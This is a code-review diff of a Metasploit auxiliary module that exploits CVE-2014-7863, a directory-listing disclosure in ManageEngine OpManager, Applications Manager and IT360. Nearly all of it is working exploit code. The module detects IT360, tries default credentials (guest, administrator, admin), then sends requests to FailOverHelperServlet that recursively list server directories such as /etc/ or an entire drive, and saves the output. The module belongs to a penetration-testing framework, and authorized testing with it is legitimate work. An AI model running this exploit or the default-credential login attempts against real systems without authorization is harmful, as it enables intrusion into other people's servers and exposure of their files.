Merge pull request #14 from jvazquez-r7/review_4659
Clean OpManager directory content disclosure modulebug/bundler_fix
commit
50c518d763
|
@ -12,21 +12,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "ManageEngine OpManager / Applications Manager / IT360 Arbitrary Directory Listing",
|
||||
'Name' => "ManageEngine Multiple Products Arbitrary Directory Listing",
|
||||
'Description' => %q{
|
||||
This module exploits a directory listing information disclosure vulnerability in
|
||||
FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360.
|
||||
It recurses through diretories, so it will list the whole drive if you ask it to list
|
||||
/ in Linux or C:\ in Windows.
|
||||
This vulnerability is unauthenticated on OpManager and Applications Manager, but
|
||||
authenticated in IT360. This module will attempt to login using the default
|
||||
credentials for the administrator and guest accounts; alternatively you can provide a
|
||||
pre-authenticated cookie or a username / password combo.
|
||||
For IT360 targets enter the RPORT of the OpManager instance (usually 8300).
|
||||
This module has been tested on both Windows and Linux with several different versions
|
||||
Windows paths have to be escaped with 4 backslashes on the command line.
|
||||
There is a companion module that allows you to download an arbitrary file.
|
||||
This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.
|
||||
This module exploits a directory listing information disclosure vulnerability in the
|
||||
FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It
|
||||
makes a recursive listing, so it will list the whole drive if you ask it to list / in
|
||||
Linux or C:\ in Windows. This vulnerability is unauthenticated on OpManager and
|
||||
Applications Manager, but authenticated in IT360. This module will attempt to login
|
||||
using the default credentials for the administrator and guest accounts; alternatively
|
||||
you can provide a pre-authenticated cookie or a username / password combo. For IT360
|
||||
targets enter the RPORT of the OpManager instance (usually 8300). This module has been
|
||||
tested on both Windows and Linux with several different versions Windows paths have to
|
||||
be escaped with 4 backslashes on the command line. There is a companion module that
|
||||
allows you to download an arbitrary file. This vulnerability has been fixed in Applications
|
||||
Manager v11.9 b11912 and OpManager 11.6.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -35,61 +34,61 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-7863' ],
|
||||
[ 'OSVDB', 'TODO' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt' ],
|
||||
[ 'URL', 'FULLDISC_URL' ]
|
||||
['CVE', '2014-7863'],
|
||||
['OSVDB', 'TODO'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
|
||||
['URL', 'FULLDISC_URL']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
'DisclosureDate' => 'Jan 28 2015'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI',
|
||||
[ true, "The base path to OpManager, AppManager or IT360", '/' ]),
|
||||
OptString.new('DIRECTORY', [false, 'Path of the directory to list', '/etc/']),
|
||||
OptString.new('IAMAGENTTICKET',
|
||||
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
||||
OptString.new('USERNAME',
|
||||
[true, 'The username to login as (IT360 target only)', 'guest']),
|
||||
OptString.new('PASSWORD',
|
||||
[true, 'Password for the specified username (IT360 target only)', 'guest']),
|
||||
OptString.new('DOMAIN_NAME',
|
||||
[false, 'Name of the domain to logon to (IT360 target only)'])
|
||||
OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
|
||||
OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),
|
||||
OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
||||
OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),
|
||||
OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),
|
||||
OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_cookie
|
||||
cookie = nil
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(datastore['TARGETURI'])
|
||||
})
|
||||
|
||||
if res
|
||||
return res.get_cookies
|
||||
end
|
||||
cookie = res.get_cookies
|
||||
end
|
||||
|
||||
cookie
|
||||
end
|
||||
|
||||
def detect_it360
|
||||
res = send_request_cgi({
|
||||
'uri' => "/",
|
||||
'uri' => '/',
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def get_it360_cookie_name
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("/"),
|
||||
'uri' => normalize_uri('/')
|
||||
})
|
||||
|
||||
cookie = res.get_cookies
|
||||
|
||||
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||
return $1
|
||||
else
|
||||
|
@ -97,28 +96,24 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
def authenticate_it360(port, path, username, password)
|
||||
if datastore['DOMAIN_NAME'] == nil
|
||||
if datastore['DOMAIN_NAME'].nil?
|
||||
vars_post = {
|
||||
'LOGIN_ID' => username,
|
||||
'PASSWORD' => password,
|
||||
'isADEnabled' => "false"
|
||||
'isADEnabled' => 'false'
|
||||
}
|
||||
else
|
||||
vars_post = {
|
||||
'LOGIN_ID' => username,
|
||||
'PASSWORD' => password,
|
||||
'isADEnabled' => "true",
|
||||
'isADEnabled' => 'true',
|
||||
'domainName' => datastore['DOMAIN_NAME']
|
||||
}
|
||||
end
|
||||
|
||||
op_port = datastore['RPORT']
|
||||
datastore['RPORT'] = port
|
||||
|
||||
res = send_request_cgi({
|
||||
'rport' => port,
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(path),
|
||||
'vars_get' => {
|
||||
|
@ -129,29 +124,27 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'vars_post' => vars_post
|
||||
})
|
||||
|
||||
datastore['RPORT'] = op_port
|
||||
|
||||
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
|
||||
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
|
||||
return res.get_cookies
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
def login_it360
|
||||
# Do we already have a valid cookie? If yes, just return that.
|
||||
if datastore['IAMAGENTTICKET'] != nil
|
||||
unless datastore['IAMAGENTTICKET'].nil?
|
||||
cookie_name = get_it360_cookie_name
|
||||
cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
|
||||
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
|
||||
return cookie
|
||||
end
|
||||
|
||||
# get the correct path, host and port
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("/"),
|
||||
'uri' => normalize_uri('/')
|
||||
})
|
||||
|
||||
if res && res.redirect?
|
||||
|
@ -160,44 +153,46 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return nil
|
||||
end
|
||||
|
||||
if datastore['USERNAME'] && datastore['PASSWORD']
|
||||
print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...")
|
||||
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
|
||||
if cookie != nil
|
||||
return cookie
|
||||
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
|
||||
# we've tried with the default guest password, now let's try with the default admin password
|
||||
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
|
||||
if cookie != nil
|
||||
return cookie
|
||||
else
|
||||
# Try one more time with the default admin login for some versions
|
||||
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
|
||||
if cookie != nil
|
||||
unless cookie.nil?
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
default_users = ['guest', 'administrator', 'admin']
|
||||
|
||||
default_users.each do |user|
|
||||
print_status("#{peer} - Trying to authenticate as #{user}...")
|
||||
cookie = authenticate_it360(uri[0], uri[1], user, user)
|
||||
unless cookie.nil?
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
def run
|
||||
# No point to continue if directory is not specified
|
||||
if datastore['DIRECTORY'].nil? || datastore['DIRECTORY'].empty?
|
||||
print_error("Please supply the path of the directory you want to list.")
|
||||
if datastore['DIRECTORY'].empty?
|
||||
print_error('Please supply the path of the directory you want to list.')
|
||||
return
|
||||
end
|
||||
|
||||
if detect_it360
|
||||
print_status("#{peer} - Detected IT360, attempting to login...")
|
||||
cookie = login_it360
|
||||
if cookie == nil
|
||||
print_error("#{peer} - Failed to login to IT360!")
|
||||
return
|
||||
end
|
||||
else
|
||||
cookie = get_cookie
|
||||
end
|
||||
|
||||
if cookie.nil?
|
||||
print_error("#{peer} - Failed to get application cookies!")
|
||||
return
|
||||
end
|
||||
|
||||
servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
|
@ -218,7 +213,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'vars_get' => {
|
||||
'operation' => 'listdirectory',
|
||||
'rootDirectory' => datastore['DIRECTORY']
|
||||
},
|
||||
}
|
||||
})
|
||||
rescue Rex::ConnectionRefused
|
||||
print_error("#{peer} - Could not connect.")
|
||||
|
@ -226,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
# Show data if needed
|
||||
if res && res.code == 200
|
||||
if res && res.code == 200 && res.body
|
||||
vprint_line(res.body.to_s)
|
||||
fname = File.basename(datastore['DIRECTORY'])
|
||||
|
||||
|
@ -234,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'manageengine.http',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
res.body,
|
||||
res.body.to_s,
|
||||
fname
|
||||
)
|
||||
print_good("File with directory listing saved in: #{path}")
|
||||
|
|
Loading…
Reference in New Issue